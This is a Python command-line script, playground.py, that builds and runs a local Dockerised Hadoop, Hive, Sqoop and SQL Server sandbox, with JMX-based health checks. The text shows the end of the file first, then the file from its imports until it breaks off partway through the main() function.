launch_ssms_p.add_argument('--executable-path', '-f')
launch_ssms_p.set_defaults(func=launch_ssms_win_local_cmd, executable_path= \
'C:\\Program Files (x86)\\Microsoft SQL Server Management Studio 18\\Common7\\IDE\\Ssms.exe')
# exec-hive-file
exec_hive_file_p = subparsers.add_parser('exec-hive-file', help='Executes a hive script from' \
' the src folder.')
exec_hive_file_p.add_argument('--src-path', '-f', help='The relative path to the file on the ' \
'linux node')
exec_hive_file_p.set_defaults(func=exec_hive_file_cmd)
# exec-hive-query
exec_hive_query_p = subparsers.add_parser('exec-hive-query', help='Executes a single' \
' hive query.')
exec_hive_query_p.add_argument('--query', '-e', help='The hive query string to execute.')
exec_hive_query_p.set_defaults(func=exec_hive_query_cmd)
# print-health
subparsers.add_parser('print-health', help='Prints the cluster health information.') \
.set_defaults(func=print_health_cmd)
# wait-for-healthy-nodes
wait_p = subparsers.add_parser('wait-for-healthy-nodes', help='Waits until the cluster is ' \
'healthy or until timeout.')
wait_p.add_argument('--timeout', '-t', help='The time in seconds until command timeout.')
wait_p.set_defaults(func=wait_for_healthy_nodes_cmd, timeout=200)
args = parser.parse_args()
if not args.func:
print('No subcommand selected. Use -h to get help.')
parser.print_usage()
return
config = configure(args)
args.func(config, args)
print('Program end.')
if __name__ == '__main__':
main() | playground.py | import argparse
import collections
import distutils.dir_util
import json
import os
import re
import shutil
import subprocess
import sys
import time
# PyPI installed modules...
import requests
# The root directory of the playground repository
ROOT_DIR = os.path.dirname(os.path.realpath(__file__))
# The hadoop distribution path on the docker nodes
HADOOP_HOME = '/himage/hadoop-3.3.0'
# The hive distribution path on the docker nodes
HIVE_HOME = '/himage/apache-hive-3.1.2-bin'
# The sqoop distribution path on the docker nodes
SQOOP_HOME = '/himage/sqoop-1.4.7.bin__hadoop-2.6.0'
# The path of the docker-compose.yml file
COMPOSE_FILE = os.path.join(ROOT_DIR, 'docker-compose.yml')
# The non-secured sql password used on the sql node
SQL_TEST_PASSWORD = '<PASSWORD>'
# The number of data nodes in the cluster (this variable only affects health checks)
NUM_DATA_NODES = 1
# The number of node manager nodes in the cluster (this variable only affects health checks)
NUM_NODE_MANAGERS = 1
# The minimum amount of disk space each node requires to operate (applicable in health checks)
MIN_DISK_SPACE = 8589934592 # 1GB
# Exposed localhost ports for each of the nodes
PORT_UI_NN1 = 3000
PORT_UI_DN1 = 3001
PORT_UI_RMAN = 3002
PORT_UI_NM1 = 3003
PORT_UI_MRHIST = 3004
PORT_UI_HS = 3005
PORT_SQL_SQL = 3006
# Descriptions of what each port does
PORT_DOC = [
(PORT_UI_NN1, 'http', 'Web UI for the primary name node'),
(PORT_UI_DN1, 'http', 'Web UI for data node 1'),
(PORT_UI_RMAN, 'http', 'Web UI for YARN resource manager'),
(PORT_UI_NM1, 'http', 'Web UI for node manager 1'),
(PORT_UI_MRHIST, 'http', 'Web UI map reduce history server'),
(PORT_UI_HS, 'http', 'Web UI for hive server'),
(PORT_SQL_SQL, 'sql (tcp/ip)', 'SQL server connection port')
]
# A health checklist item description
NodeHealthBeanCheck = collections.namedtuple('NodeHealthBeanCheck', \
'bean_name prop_name check_func')
# The status of a single node in the cluster
NodeHealthReport = collections.namedtuple('NodeHealthReport', \
'is_healthy message')
# A summary of the status on each of the nodes in the cluster
HealthReportSummary = collections.namedtuple('HealthReportSummary', \
'cluster_healthy nn1 dn1 rman nm1 mrhist hs client sql')
class Config:
"""
Represents the configuration for any playground tasks
"""
def __init__(self, project_name=None, source_dir=None, data_dir=None, volumes_dir=None):
self.project_name = project_name
self.source_dir = source_dir
self.data_dir = data_dir
self.volumes_dir = volumes_dir
@property
def project_name(self):
"""
The project name used for the Docker-Compose project name
"""
return self._project_name
@project_name.setter
def project_name(self, value):
self._project_name = value
@property
def source_dir(self):
"""
The local directory containing files to be uploaded to the client node /src directory upon
setup.
"""
return self._source_dir
@source_dir.setter
def source_dir(self, value):
if value:
self._source_dir = os.path.abspath(value)
else:
self._source_dir = None
@property
def data_dir(self):
"""
The local directory containing files to be ingested into HDFS upon setup.
"""
return self._data_dir
@data_dir.setter
def data_dir(self, value):
if value:
self._data_dir = os.path.abspath(value)
else:
self._data_dir = None
@property
def volumes_dir(self):
"""
The local directory (which may not yet exist) where docker will persist files between runs.
"""
return self._volumes_dir
@volumes_dir.setter
def volumes_dir(self, value):
if value:
self._volumes_dir = os.path.abspath(value)
else:
self._volumes_dir = None
def save(self, filename):
"""
Saves the configuration to a file.
"""
with open(filename, 'w') as _fp:
json.dump({ \
'project_name': self._project_name, \
'source_dir': self._source_dir, \
'data_dir': self._data_dir, \
'volumes_dir': self._volumes_dir \
}, _fp, indent=2)
@staticmethod
def load(filename):
"""
Loads the configuration from a file.
"""
with open(filename, 'r') as _fp:
_c = Config()
_j = json.load(_fp)
_c.project_name = _j['project_name']
_c.source_dir = _j['source_dir']
_c.data_dir = _j['data_dir']
_c.volumes_dir = _j['volumes_dir']
return _c
def exec_docker(config, node_name, command, workdir=None, \
interactive=False, detached=False, check=True):
"""
Executes a command on a node through docker.
"""
_args = ['docker', 'exec']
if workdir:
_args.append('-w')
_args.append(workdir)
if interactive:
_args.append('-i')
_args.append('-t')
if detached:
_args.append('-d')
_args.append('%s_%s_1' % (config.project_name, node_name))
split_spaces = True
for _c in command.split('"'):
if split_spaces:
_splt = _c.split(' ')
for _s in _splt:
if _s:
_args.append(_s)
else:
_args.append(_c)
split_spaces = not split_spaces
output = subprocess.run(_args, check=check, shell=True)
return output.returncode
def build_img(config):
"""
Builds or rebuilds the dockerfile images.
"""
set_environment(config)
os.system('docker-compose -p %s -f "%s" build' % (config.project_name, COMPOSE_FILE))
def format_hdfs(config):
"""
Formats hdfs in the cluster.
"""
exec_docker(config, 'nn1', '%s/bin/hdfs namenode -format -force clust' % (HADOOP_HOME))
def ingest_data(config):
"""
Ingests data from the configured data volume into hdfs.
"""
exec_docker(config, 'nn1', '%s/bin/hadoop fs -put /data /data' % (HADOOP_HOME))
def copy_source(config):
"""
Copies from the configured local source directory to the source volume.
Use to update the client node's /src folder on a running cluster when new code is written.
"""
if not os.path.exists(config.source_dir):
print('Source directory does not exist. Please check configuration and try again.')
return
dir_name = os.path.join(config.volumes_dir, 'client')
if not os.path.exists(dir_name):
os.makedirs(dir_name)
distutils.dir_util.copy_tree(config.source_dir, dir_name)
print('Source files copied to volume.')
def setup_hive(config):
"""
Makes required hdfs directories for hive to run and initializes the schema metastore.
"""
fs_cmd = '%s/bin/hadoop fs ' % (HADOOP_HOME)
exec_docker(config, 'nn1', fs_cmd + '-mkdir /tmp', check=False)
exec_docker(config, 'nn1', fs_cmd + '-mkdir -p /user/hive/warehouse', check=False)
exec_docker(config, 'nn1', fs_cmd + '-chmod g+w /tmp')
exec_docker(config, 'nn1', fs_cmd + '-chmod g+w /user/hive/warehouse')
exec_docker(config, 'hs', '%s/bin/schematool -dbType derby -initSchema' % \
(HIVE_HOME), workdir='/metastore')
def cluster_up(config):
"""
Boots the cluster up but does not run any of the daemons.
"""
set_environment(config)
os.system('docker-compose -p %s -f "%s" up -d' % (config.project_name, COMPOSE_FILE))
def start_hadoop_daemons(config):
"""
Runs all daemons in the hadoop distribution on their respective nodes.
"""
exec_docker(config, 'nn1', '%s/bin/hdfs --daemon start namenode' % (HADOOP_HOME))
exec_docker(config, 'dn1', '%s/bin/hdfs --daemon start datanode' % (HADOOP_HOME))
exec_docker(config, 'rman', '%s/bin/yarn --daemon start resourcemanager' % (HADOOP_HOME))
exec_docker(config, 'nm1', '%s/bin/yarn --daemon start nodemanager' % (HADOOP_HOME))
exec_docker(config, 'mrhist', '%s/bin/mapred --daemon start historyserver' % (HADOOP_HOME))
def start_hive_server(config):
"""
Starts the hive server daemon.
"""
exec_docker(config, 'hs', '%s/bin/hiveserver2' % (HIVE_HOME), \
detached=True, workdir='/metastore')
def cluster_down(config):
"""
Spins the cluster down.
"""
set_environment(config)
os.system('docker-compose -p %s -f "%s" down' % (config.project_name, COMPOSE_FILE))
def metric_request(port):
"""
Sends an http request to a node's jmx endpoint. Returns the parsed json, or None on error.
"""
try:
_r = requests.get('http://localhost:%d/jmx' % (port))
except:
return None
if _r.status_code != 200:
return None
try:
return _r.json()
except ValueError:
return None
def find_bean_by_name(jsn, nme):
"""
Extracts a bean of the given name from jmx metrics json object.
"""
if 'beans' not in jsn:
return None
else:
return next((b for b in jsn['beans'] if b['name'] == nme), None)
def extract_bean_prop(jsn, bean_name, propname):
"""
Extracts a property of a bean of the given name from jmx metrics json object.
"""
bean = find_bean_by_name(jsn, bean_name)
if bean and propname in bean:
return bean[propname]
else:
return None
def gen_node_report_from_checks(jsn, checks):
"""
Creates a node health report using the jmx metrics json and a list of type NodeHealthBeanCheck
"""
healthy = True
messages = []
for _c in checks:
prop = extract_bean_prop(jsn, _c.bean_name, _c.prop_name)
if prop is not None:
report = _c.check_func(prop)
prefix = '\u2705 '
if not report.is_healthy:
healthy = False
prefix = '\u274C '
messages.append(prefix + report.message)
else:
healthy = False
messages.append('\u274C Missing required bean property. Bean name: "%s", property: "%s"' % \
(_c.bean_name, _c.prop_name))
message = '\n'.join(messages)
return NodeHealthReport(is_healthy=healthy, message=message)
def _check_func_disk_space(prop_val):
"""
A check function for comparing the prop_val to the expected disk space amount.
"""
return NodeHealthReport(is_healthy=True, message='Sufficient disk space.') \
if prop_val >= MIN_DISK_SPACE else NodeHealthReport(is_healthy=False, message='Insufficient' \
' disk space. Minimum required disk space is %d. Remaining bytes: %d' % \
(MIN_DISK_SPACE, prop_val))
def json_checker_namenode(jsn):
"""
Checks the jmx metrics json for the namenode and returns a node health report
"""
checks = [
NodeHealthBeanCheck( \
bean_name='Hadoop:service=NameNode,name=StartupProgress', \
prop_name='PercentComplete', \
check_func=lambda i: NodeHealthReport(is_healthy=True, message='Startup completed.') \
if i == 1.0 else NodeHealthReport(is_healthy=False, message='Startup not complete.' \
' Progress: %%%f.' % (i * 100)) \
),
NodeHealthBeanCheck( \
bean_name='Hadoop:service=NameNode,name=FSNamesystem', \
prop_name='tag.HAState', \
check_func=lambda i: NodeHealthReport(is_healthy=True, message='Namenode active.') \
if i == 'active' else NodeHealthReport(is_healthy=False, message='Namenode inactive.' \
' State: "%s"' % (i)) \
),
NodeHealthBeanCheck( \
bean_name='Hadoop:service=NameNode,name=FSNamesystem', \
prop_name='MissingBlocks', \
check_func=lambda i: NodeHealthReport(is_healthy=True, message='No missing blocks.') \
if i == 0 else NodeHealthReport(is_healthy=False, message='One or more missing blocks.' \
' Data is missing. Blocks missing: %d.' % (i)) \
),
NodeHealthBeanCheck( \
bean_name='Hadoop:service=NameNode,name=FSNamesystem', \
prop_name='CapacityRemaining', \
check_func=_check_func_disk_space
),
NodeHealthBeanCheck( \
bean_name='Hadoop:service=NameNode,name=FSNamesystemState', \
prop_name='NumLiveDataNodes', \
check_func=lambda i: NodeHealthReport(is_healthy=True, message='All data nodes' \
' are connected.') \
if i == 1 else NodeHealthReport(is_healthy=False, message='Some data nodes are not' \
' connected. Number of connected data nodes: %d/%d' % (i, NUM_DATA_NODES)) \
),
NodeHealthBeanCheck( \
bean_name='Hadoop:service=NameNode,name=FSNamesystemState', \
prop_name='NumStaleDataNodes', \
check_func=lambda i: NodeHealthReport(is_healthy=True, message='No stale data nodes.') \
if i == 0 else NodeHealthReport(is_healthy=False, message='Some data nodes have not ' \
'sent a heartbeat in some time. Number of stale data nodes: %d' % (i)) \
)
]
return gen_node_report_from_checks(jsn, checks)
def json_checker_datanode(jsn):
"""
Checks the jmx metrics json for the datanode and returns a node health report
"""
checks = [
NodeHealthBeanCheck( \
bean_name='Hadoop:service=DataNode,name=FSDatasetState', \
prop_name='Remaining', \
check_func=_check_func_disk_space \
),
NodeHealthBeanCheck( \
bean_name='Hadoop:service=DataNode,name=FSDatasetState', \
prop_name='NumFailedVolumes', \
check_func=lambda i: NodeHealthReport(is_healthy=True, message='No failed volumes.') \
if i == 0 else NodeHealthReport(is_healthy=False, message='One or more volumes have' \
' failed. Number of failed volumes: %d' % (i)) \
)
]
return gen_node_report_from_checks(jsn, checks)
def json_checker_resourcemanager(jsn):
"""
Checks the jmx metrics json for the resource manager node and returns a node health report
"""
checks = [
NodeHealthBeanCheck( \
bean_name='Hadoop:service=ResourceManager,name=ClusterMetrics', \
prop_name='NumActiveNMs', \
check_func=lambda i: NodeHealthReport(is_healthy=True, message='All node managers' \
' connected.') \
if i == 1 else NodeHealthReport(is_healthy=False, message='One or more node' \
' managers not connected. Number of connected node managers: %d/%d' % \
(i, NUM_NODE_MANAGERS)) \
),
NodeHealthBeanCheck( \
bean_name='Hadoop:service=ResourceManager,name=ClusterMetrics', \
prop_name='NumUnhealthyNMs', \
check_func=lambda i: NodeHealthReport(is_healthy=True, message='All node managers' \
' are healthy.') \
if i == 0 else NodeHealthReport(is_healthy=False, message='One or more node' \
' managers are unhealthy. Number of unhealthy node managers: %d' % (i)) \
)
]
return gen_node_report_from_checks(jsn, checks)
def json_checker_response_only(jsn):
"""
Checks the jmx metrics json on any node that has jmx metrics but no other specific health checks
"""
healthy = 'beans' in jsn and len(jsn['beans']) > 0
if healthy:
return NodeHealthReport(is_healthy=True, message='\u2705 Response has expected json.')
else:
return NodeHealthReport(is_healthy=False, message='\u274C Response does not' \
' have expected json.')
def gen_node_health_report(jsn, json_checker_func):
"""
Generates a node health report using the json checker function
"""
if jsn:
return json_checker_func(jsn)
else:
message = '\u274C Could not fetch metrics from server. Most likely the node is down.'
return NodeHealthReport(is_healthy=False, message=message)
def gen_docker_health_report(config, node_name):
"""
Generates a health report simply based on if the given node is running or not.
"""
return_code = exec_docker(config, node_name, 'bash -c exit 0', check=False)
if return_code == 0:
return NodeHealthReport(is_healthy=True, message='\u2705 Node running')
else:
return NodeHealthReport(is_healthy=False, message='\u274C Node not running')
def gen_health_summary(config):
"""
Generates a health report summary on the running cluster.
"""
_name_node1 = gen_node_health_report(metric_request(PORT_UI_NN1), json_checker_namenode)
_data_node1 = gen_node_health_report(metric_request(PORT_UI_DN1), json_checker_datanode)
_rman = gen_node_health_report(metric_request(PORT_UI_RMAN), json_checker_resourcemanager)
_nm1 = gen_node_health_report(metric_request(PORT_UI_NM1), json_checker_response_only)
_mrhist = gen_node_health_report(metric_request(PORT_UI_MRHIST), json_checker_response_only)
_hs = gen_node_health_report(metric_request(PORT_UI_HS), json_checker_response_only)
_client = gen_docker_health_report(config, 'client')
_sql = gen_docker_health_report(config, 'sql')
_cluster_healthy = \
_name_node1.is_healthy and \
_data_node1.is_healthy and \
_rman.is_healthy and \
_nm1.is_healthy and \
_mrhist.is_healthy and \
_hs.is_healthy and \
_client.is_healthy and \
_sql.is_healthy
summary = HealthReportSummary( \
cluster_healthy=_cluster_healthy, \
nn1=_name_node1, \
dn1=_data_node1, \
rman=_rman, \
nm1=_nm1, \
mrhist=_mrhist, \
hs=_hs, \
client=_client, \
sql=_sql)
return summary
def print_node_health(report):
"""
Prints a node health report
"""
if report is None:
print('? Report not implemented.')
print()
return
print('Overall Status:')
print('\u2705 Healthy' if report.is_healthy else '\u274C Unhealthy')
print('Checklist:')
print(report.message)
print()
def print_summary(summary):
"""
Prints a summary health report
"""
print('NAME NODE 1')
print_node_health(summary.nn1)
print('DATA NODE 1')
print_node_health(summary.dn1)
print('RESOURCE MANAGER')
print_node_health(summary.rman)
print('NODE MANAGER 1')
print_node_health(summary.nm1)
print('MAP REDUCE HISTORY SERVER')
print_node_health(summary.mrhist)
print('HIVE SERVER')
print_node_health(summary.hs)
print('CLIENT NODE')
print_node_health(summary.client)
print('SQL SERVER')
print_node_health(summary.sql)
print('OVERALL CLUSTER HEALTH')
if summary.cluster_healthy:
print('\u2705 Healthy')
else:
print('\u274C Unhealthy')
def print_health(config):
"""
Prints the health of the cluster
"""
print('Checking cluster health.')
print()
summary = gen_health_summary(config)
print_summary(summary)
def wait_for_healthy_nodes_print(config, timeout):
"""
Blocks until all nodes are healthy or until timeout, and prints the results.
"""
_start = time.time()
summary = wait_for_healthy_nodes(config, timeout=timeout)
print('Wait completed in %fs. Summary:' % (time.time() - _start))
print()
print_summary(summary)
def get_summary_preview_str(summary):
"""
Gets a oneliner string displaying the summarized cluster health
"""
_s = [
('nn1', summary.nn1.is_healthy),
('dn1', summary.dn1.is_healthy),
('rman', summary.rman.is_healthy),
('nm1', summary.nm1.is_healthy),
('mrhist', summary.mrhist.is_healthy),
('hs', summary.hs.is_healthy),
('client', summary.client.is_healthy),
('sql', summary.sql.is_healthy)
]
_s2 = map(lambda a : '%s %s' % \
(('\u2705' if a[1] else '\u274C'), a[0]), _s)
return ', '.join(_s2)
def wait_for_healthy_nodes(config, timeout=200, interval=5):
"""
Blocks until all nodes are healthy or until timeout
"""
_summary = None
for _t in range(int(timeout / interval)):
_summary = gen_health_summary(config)
if _summary.cluster_healthy:
return _summary
else:
print('...Waiting... ' + get_summary_preview_str(_summary))
time.sleep(interval)
return _summary
def setup(config):
"""
One-time setup for the cluster.
"""
print('Destroying volumes.')
destroy_volumes(config)
print('Spinning cluster up.')
cluster_up(config)
print('Formatting HDFS.')
format_hdfs(config)
print('Starting Hadoop Daemons.')
start_hadoop_daemons(config)
print('Setting up Hive server.')
setup_hive(config)
print('Ingesting configured data volume into HDFS (this could take some time).')
ingest_data(config)
print('Copying configured source folder to the client node volume.')
copy_source(config)
print('Spinning cluster down.')
cluster_down(config)
def print_port_doc():
"""
Prints documentation on the exposed ports.
"""
print('Exposed ports on localhost:')
for _p in PORT_DOC:
print('Port: %s, Type: %s, Description: %s' % \
(_p[0], _p[1], _p[2]))
def start(config, wait=True):
"""
Boots up the cluster and starts all of the daemons on the cluster.
"""
print('Spinning cluster up.')
cluster_up(config)
print('Starting Hadoop Daemons.')
start_hadoop_daemons(config)
print('Starting Hive Server.')
start_hive_server(config)
if wait:
print('Starting wait routine.')
wait_for_healthy_nodes_print(config, 200)
print_port_doc()
def stop(config):
"""
Spins down the cluster.
"""
print('Spinning cluster down.')
cluster_down(config)
def destroy_volumes(config):
"""
Removes the persistant file storage of the cluster.
"""
print('Spinning cluster down.')
cluster_down(config)
if not os.path.exists(config.volumes_dir):
print('Volumes directory does not exist. Cannot delete.')
else:
print('Deleting files.')
shutil.rmtree(config.volumes_dir)
def print_hadoop_node_logs(config, node_name):
"""
Prints the logs of the given hadoop node.
"""
exec_docker(config, node_name, 'cat %s/logs/*.log')
def beeline_cli(config):
"""
Launches an interactive cli on the client node with beeline cli.
"""
exec_docker(config, 'client', '%s/bin/beeline -u jdbc:hive2://hs:10000' % (HIVE_HOME), \
workdir='/src', interactive=True)
def bash_cli(config, nodename):
"""
Launches an interactive bash shell on the given node.
"""
exec_docker(config, nodename, 'bash', interactive=True)
def sqlcmd_cli(config, local):
"""
Launches an interactive sql cli on the client node or local host if specified.
"""
if local:
os.system('sqlcmd -S tcp:localhost,%d -U sa -P %s' % (PORT_SQL_SQL, SQL_TEST_PASSWORD))
else:
exec_docker(config, 'client', '/opt/mssql-tools/bin/sqlcmd -S sql -U sa -P %s' % \
(SQL_TEST_PASSWORD), workdir='/src', interactive=True)
def sql_exec_query(config, query, database_name='master'):
"""
Executes an sql query from the client node.
"""
exec_docker(config, 'client', '/opt/mssql-tools/bin/sqlcmd -S sql' \
' -U sa -d %s -P %s -q "%s"' % \
(database_name, SQL_TEST_PASSWORD, query), workdir='/src')
def sql_exec_file(config, filename):
"""
Executes an sql file from the source directory on the client node.
"""
exec_docker(config, 'client', '/opt/mssql-tools/bin/sqlcmd -S sql -U sa -P %s -i "%s"' % \
(SQL_TEST_PASSWORD, filename), workdir='/src')
def sqoop_export(config, export_dir, sql_table, database_name='master', delimiter=','):
"""
Exports HDFS text delimited files to the sql node.
"""
exec_docker(config, 'client', '%s/bin/sqoop export --connect' \
' "jdbc:sqlserver://sql;databaseName=%s"' \
' --username "sa" --password "%s" --export-dir "%s" --table "%s"' \
' --input-fields-terminated-by "%s"' % \
(SQOOP_HOME, database_name, SQL_TEST_PASSWORD, export_dir, sql_table, delimiter), \
workdir='/src')
def launch_ssms_win_local(executable_path):
"""
Launches Sql Server Management Studio locally.
"""
if os.name == 'nt':
if os.path.exists(executable_path):
print('Note: Connection will only succeed if "Remember Password" has been checked in ' \
'the SSMS login previously.')
print('Use test password: %s' % (SQL_TEST_PASSWORD))
os.system('"%s" -S tcp:localhost,%d -U sa' % (executable_path, PORT_SQL_SQL))
else:
print('The executable path for ssms does not exist. Please provide the correct one with' \
' arg "-f".' \
)
else:
print('This command is not implemented for non-Windows platforms.')
def exec_hive_file(config, src_file):
"""
Executes a hive script file from the source directory on the client node.
"""
exec_docker(config, 'client', '%s/bin/beeline -u jdbc:hive2://hs:10000 -f %s' % \
(HIVE_HOME, src_file), workdir='/src')
def exec_hive_query(config, query):
"""
Executes a hive query from the client node.
"""
exec_docker(config, 'client', '%s/bin/beeline -u jdbc:hive2://hs:10000 -e "%s"' % \
(HIVE_HOME, query), workdir='/src')
def input_with_validator(prompt, failure_msg, validator_func):
"""
Prompts for interactive user input using a validator function.
"""
while True:
val = input(prompt)
if validator_func(val):
return val
else:
print(failure_msg)
def validate_project_name(val):
"""
Input validator function for project name configuration.
"""
pattern = re.compile(r'\W')
return not pattern.search(val) and val.isalnum()
def validate_directory(val):
"""
Input validator function for a directory name.
"""
return os.path.exists(val)
def validate_parent_directory(val):
"""
Input validator function for a directory name where only the parent directory needs to exist.
"""
return os.path.exists(os.path.dirname(val))
def validate_yn(val):
"""
Input validator function for yes/no prompts.
"""
_l = val.lower()
return _l == 'y' or _l == 'n'
def set_environment(config):
"""
Sets the environment variables for consumption by docker-compose.
"""
os.environ['project_name'] = config.project_name
os.environ['source_dir'] = config.source_dir
os.environ['data_dir'] = config.data_dir
os.environ['volumes_dir'] = config.volumes_dir
os.environ['sql_test_password'] = <PASSWORD>
def configure(args):
"""
Returns config using a file, arguments, or interactive input.
"""
_f = args.config_file
config = None
if get_config_file_needed(args):
if not os.path.exists(_f):
_o = input_with_validator('Config file "%s" does not exist. Would you like to create one' \
' interactively? (y/n): ' % _f, 'Please input "y" or "n".', validate_yn)
if _o.lower() == 'y':
config = configure_interactively()
config.save(_f)
print('Config saved.')
else:
print('Program needs configuration. Exiting.')
sys.exit(1)
return
else:
config = Config.load(_f)
print('Config read.')
if args.project_name:
config.project_name = args.project_name
if args.source_dir:
config.source_dir = args.source_dir
if args.data_dir:
config.data_dir = args.data_dir
if args.volumes_dir:
config.volumes_dir = args.volumes_dir
else:
config = Config(args.project_name, args.source_dir, args.data_dir, args.volumes_dir)
return config
def configure_interactively():
"""
Creates a config from interactive input.
"""
proj_name = input_with_validator( \
'Please input your project name: ', \
'No spaces or non-alphanumeric characters allowed.', \
validate_project_name \
)
src_dir = input_with_validator( \
'Please input your playground src directory: ', \
'Please use a valid directory name that exists.', \
validate_directory \
)
data_dir = input_with_validator( \
'Please input your data directory: ', \
'Please use a valid directory name that exists.', \
validate_directory \
)
vol_dir = input_with_validator( \
'Please input your volumes directory: ', \
'Please use a valid parent directory name that exists.', \
validate_parent_directory \
)
config = Config(proj_name, src_dir, data_dir, vol_dir)
return config
def build_img_cmd(config, args):
"""
Command line function. See build_img() for documentation.
"""
build_img(config)
def format_hdfs_cmd(config, args):
"""
Command line function. See format_hdfs() for documentation.
"""
format_hdfs(config)
def ingest_data_cmd(config, args):
"""
Command line function. See ingest_data() for documentation.
"""
ingest_data(config)
def copy_source_cmd(config, args):
"""
Command line function. See copy_source() for documentation.
"""
copy_source(config)
def setup_hive_cmd(config, args):
"""
Command line function. See setup_hive() for documentation.
"""
setup_hive(config)
def cluster_up_cmd(config, args):
"""
Command line function. See cluster_up() for documentation.
"""
cluster_up(config)
def start_hadoop_daemons_cmd(config, args):
"""
Command line function. See start_hadoop_daemons() for documentation.
"""
start_hadoop_daemons(config)
def start_hive_server_cmd(config, args):
"""
Command line function. See start_hive_server() for documentation.
"""
start_hive_server(config)
def cluster_down_cmd(config, args):
"""
Command line function. See cluster_down() for documentation.
"""
cluster_down(config)
def setup_cmd(config, args):
"""
Command line function. See setup() for documentation.
"""
if args.skip_confirm:
setup(config)
return
result = input_with_validator('Are you sure you want to delete directory "%s" and all of its' \
' files? y/n: ' % (config.volumes_dir), \
'Please use "y" or "n".', \
validate_yn \
).lower()
if result == 'y':
setup(config)
else:
print('Cancelling.')
def start_cmd(config, args):
"""
Command line function. See start() for documentation.
"""
start(config, wait=not args.no_wait)
def stop_cmd(config, args):
"""
Command line function. See stop() for documentation.
"""
stop(config)
def destroy_volumes_cmd(config, args):
"""
Command line function. See destroy_volumes() for documentation.
"""
if args.skip_confirm:
destroy_volumes(config)
return
result = input_with_validator('Are you sure you want to delete directory "%s" and all of its' \
' files? y/n: ' % (config.volumes_dir), \
'Please use "y" or "n".', \
validate_yn \
).lower()
if result == 'y':
destroy_volumes(config)
else:
print('Cancelling.')
def print_hadoop_node_logs_cmd(config, args):
"""
Command line function. See print_hadoop_node_logs() for documentation.
"""
print_hadoop_node_logs(config, args.node)
def beeline_cli_cmd(config, args):
"""
Command line function. See beeline_cli() for documentation.
"""
beeline_cli(config)
def bash_cli_cmd(config, args):
"""
Command line function. See bash_cli() for documentation.
"""
bash_cli(config, args.node)
def sqlcmd_cli_cmd(config, args):
"""
Command line function. See sqlcmd_cli() for documentation.
"""
sqlcmd_cli(config, args.local)
def sql_exec_query_cmd(config, args):
"""
Command line function. See sql_exec_query() for documentation.
"""
sql_exec_query(config, args.query, args.database)
def sql_exec_file_cmd(config, args):
"""
Command line function. See sql_exec_file() for documentation.
"""
sql_exec_file(config, args.filename)
def sqoop_export_cmd(config, args):
"""
Command line function. See sqoop_export() for documentation.
"""
sqoop_export(config, args.export_dir, args.sql_table, args.database_name, args.delimiter)
def local_sql_info_cmd(config, args):
"""
Command line function. Prints out non-secured sql server connection info.
"""
print('SERVER NAME: tcp:localhost,%d' % (PORT_SQL_SQL))
print('AUTHENTICATION: SQL Server AUthentication')
print('LOGIN: sa')
print('PASSWORD: %s' % (SQL_TEST_PASSWORD))
def launch_ssms_win_local_cmd(config, args):
"""
Command line function. See launch_ssms_win_local() for documentation.
"""
launch_ssms_win_local(args.executable_path)
def exec_hive_file_cmd(config, args):
"""
Command line function. See exec_hive_file() for documentation.
"""
exec_hive_file(config, args.src_path)
def exec_hive_query_cmd(config, args):
"""
Command line function. See exec_hive_query() for documentation.
"""
exec_hive_query(config, args.query)
def print_health_cmd(config, args):
"""
Command line function. See print_health() for documentation.
"""
print_health(config)
def wait_for_healthy_nodes_cmd(config, args):
"""
Command line function. See wait_for_healthy_nodes_print() for documentation.
"""
wait_for_healthy_nodes_print(config, args.timeout)
def get_config_file_needed(args):
"""
Determines whether or not we need to fetch additional config variables from a file.
"""
return not (args.project_name and args.source_dir and args.data_dir and args.volumes_dir)
def main():
"""
Main entry point for the program
"""
parser = argparse.ArgumentParser(prog='playground', description='HDFS, Hive, and SQL Playground')
parser.set_defaults(func=None)
# config-file
parser.add_argument('--config-file', '-c', default='config.json', help='The filename' \
' of the configuration file.')
# config-overrides
config_group = parser.add_argument_group('config-overrides', description='Overrides' \
' the configuration variables.')
config_group.add_argument('--project-name', '-p')
config_group.add_argument('--source-dir', '-s')
config_group.add_argument('--data-dir', '-d')
config_group.add_argument('--volumes-dir', '-v')
config_group.set_defaults(project_name=None, source_dir=None, data_dir=None, volumes_dir=None)
subparsers = parser.add_subparsers()
# build-img
subparsers.add_parser('build-img', help='Builds or rebuilds the required Docker images. Do this' \
' when you change the Dockerfile or anything in ./bin/.').set_defaults(func=build_img_cmd)
# format-hdfs
subparsers.add_parser('format-hdfs', help='Formats the entire distributed file system of the' \
' running cluster.').set_defaults(func=format_hdfs_cmd)
# ingest-data
subparsers.add_parser('ingest-data', help='Copies the mounted data volume to HDFS at /data on' \
' the running cluster.').set_defaults(func=ingest_data_cmd)
# copy-source
subparsers.add_parser('copy-source', help='Copies the configured source folder to the mounted' \
' client node volume.').set_defaults(func=copy_source_cmd)
# setup-hive
subparsers.add_parser('setup-hive', help='Creates the Hive schema metastore and makes' \
' necessary directories in HDFS. Cluster should be up and hadoop daemons should already' \
' be running.').set_defaults(func=setup_hive_cmd)
# cluster-up
subparsers.add_parser('cluster-up', help='Boots up all the nodes on the cluster but does not' \
' start any of their services.').set_defaults(func=cluster_up_cmd)
# start-hadoop
subparsers.add_parser('start-hadoop', help='Starts the name node and data node services for' \
' HDFS on a running cluster.').set_defaults(func=start_hadoop_daemons_cmd)
# start-hive
subparsers.add_parser('start-hive', help='Starts the hive server in the running cluster.') \
.set_defaults(func=start_hive_server_cmd)
# cluster-down
subparsers.add_parser('cluster-down', help='Shuts down all of the nodes.') \
.set_defaults(func=cluster_down_cmd)
# setup
setup_p = subparsers.add_parser('setup', help='Sets up the cluster for the first time.')
setup_p.add_argument('--skip-confirm', '-y', action='store_true', help='Skips any confirmation' \
' messages')
setup_p.set_defaults(func=setup_cmd, skip_confirm=False)
# start
start_p = subparsers.add_parser('start', help='Spins up the cluster and starts the daemons on ' \
'each node.')
start_p.add_argument('--no-wait', '-w', action='store_true', help='Exits immediately after ' \
'the cluster daemons have been told to start rather than blocking until the nodes are healthy.')
start_p.set_defaults(func=start_cmd, no_wait=False)
# stop
subparsers.add_parser('stop', help='Stops all of the services and shuts down all of the nodes.') \
.set_defaults(func=stop_cmd)
# destroy-vol
destroy_vol_p = subparsers.add_parser('destroy-vol', help='Removes all persisted cluster files.')
destroy_vol_p.add_argument('--skip-confirm', '-y', action='store_true')
destroy_vol_p.set_defaults(func=destroy_volumes_cmd, skip_confirm=False)
# print-hadoop-logs
print_hadoop_node_logs_p = subparsers.add_parser('print-hadoop-logs', help='Prints the log file' \
' of the specified hadoop node.')
